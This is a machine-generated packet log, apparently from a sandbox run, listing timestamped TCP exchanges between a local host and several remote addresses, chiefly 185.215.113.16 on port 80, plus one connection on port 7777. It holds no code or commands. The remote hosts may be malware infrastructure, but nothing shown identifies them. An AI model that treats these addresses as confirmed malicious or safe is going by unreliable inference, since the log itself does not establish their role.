Dec 14, 2024 23:58:45.642055988 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.642630100 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.642688990 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.642760038 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.642812967 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.643404961 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.643467903 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.643539906 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.643601894 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.644176960 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.644227028 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.644340038 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.644386053 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.644942045 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.644989967 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.645076036 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.645122051 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.645750046 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.645802975 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.645874977 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.645922899 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.646528006 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.646574974 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.646663904 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.646717072 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.647286892 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.647341967 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.647413015 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.647466898 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.648147106 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.648197889 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.648334026 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.648386955 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.649054050 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.649107933 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.649168968 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.649219036 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.649637938 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.649691105 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.649763107 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.649816990 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.650402069 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.650455952 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.650589943 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.650650978 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.651176929 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.651226997 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.651310921 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.651390076 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.651967049 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.652034998 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.652168989 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.652221918 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.652740955 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.652796030 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.652882099 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.652935028 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.653512001 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.653567076 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.653640032 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.653691053 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.654335976 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.654391050 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.654464006 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.654539108 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.655070066 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.655126095 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.655195951 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.655247927 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.655848026 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.655910969 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.655981064 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.656028986 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.656645060 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.656698942 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.656785965 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.656838894 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.657417059 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.657485008 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.657558918 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.657614946 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.658207893 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.658262014 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.658375978 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.658427000 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.658978939 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.659034014 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.659104109 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.659152985 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.659796000 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.659859896 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.659933090 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.659992933 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.660535097 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.660592079 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.660783052 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.660830975 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.661303997 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.661350965 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.661437035 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.661480904 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.662151098 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.662195921 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.662378073 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.662430048 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.662862062 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.662925959 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.662997007 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.663042068 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.663585901 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.663635969 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.806437016 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:45.806500912 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:45.806531906 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:45.806552887 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:45.806561947 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:45.806581974 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:45.806615114 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:45.806637049 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:45.814867020 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.814948082 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.815098047 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.815098047 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.815129995 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.815186977 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.815329075 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.815382004 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.815457106 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.815542936 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.816104889 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.816216946 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.816447973 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.816894054 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.817004919 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.817266941 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.817658901 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.817711115 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.817785978 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.817837954 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.818463087 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.818512917 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.818562984 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.818618059 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.819217920 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.819268942 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.819334030 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.819382906 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.819974899 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.820019960 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.820127964 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.820177078 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.820765972 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.820816040 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.820890903 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.820940018 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.821547031 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.821597099 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.821688890 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.821738958 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.822325945 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.822376013 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.822427988 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.822496891 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.823103905 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.823154926 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.823237896 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.823297977 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.823892117 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.823946953 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.824007034 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.824057102 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.824660063 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.824794054 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.825458050 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.825512886 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.825551987 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.825555086 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.825766087 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.826241970 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.826344013 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.826390028 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.826461077 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.826996088 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.827049017 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.827121019 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.827174902 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.827779055 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.827887058 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.827944040 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.827996016 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.828710079 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.828780890 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.829103947 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.829250097 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.829353094 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.829406023 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.829477072 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.829531908 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.830133915 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.830185890 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.830248117 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.830300093 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.830919027 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.830986977 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.831072092 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.831134081 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.831692934 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.831823111 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.831901073 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.832469940 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.832531929 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.832598925 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.832654953 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.833235979 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.833290100 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.833360910 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.833414078 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.834022045 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.834090948 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.834176064 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.834229946 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.834863901 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.834920883 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.834980965 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.835036993 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.835556030 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.835612059 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.835735083 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.835788012 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.836555004 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.836621046 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.836692095 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.836744070 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.837290049 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.837382078 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.837383032 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.837425947 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.837903976 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.837960005 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.838044882 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.838108063 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.838690996 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.838829041 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.839477062 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.839562893 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.839611053 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.840235949 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.840399981 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.840462923 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.841052055 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.841228962 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.841285944 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.841794968 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.841979980 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.842603922 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.842663050 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.842732906 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.843369007 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.843425989 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.843547106 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.844157934 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.844216108 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.844280958 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.844909906 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.844965935 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.845069885 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.845541954 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.845696926 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.845814943 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.846466064 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.846524954 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.846631050 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.847251892 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.847424030 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.847479105 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.848108053 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.848160028 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.848229885 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.848826885 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.848999977 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.849060059 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.849571943 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.849716902 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.850383997 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.850457907 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.850543976 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.851147890 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.851202011 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.851254940 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.851941109 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.851995945 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.852066994 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.852679014 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.852734089 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.852818012 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.853193998 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.853482008 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.853607893 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.853919029 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.854278088 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.854341030 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.854412079 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.854727983 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.855026960 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.855153084 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.855214119 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.878289938 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:45.922235012 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:45.925581932 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:45.925767899 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.007080078 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:46.007138968 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:46.007282972 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:46.007282972 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:46.007313967 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:46.007334948 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.007353067 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.007431984 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.007431984 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.007544994 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:46.007793903 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.007810116 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.007988930 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.008227110 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.008470058 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.008754015 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.008941889 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.008941889 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.009058952 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.009227037 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.009617090 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.009799957 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.009937048 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.010593891 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.010654926 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.010699987 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.011373043 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.011534929 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.011589050 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.012139082 CET	80	49863	185.215.113.16	192.168.2.4
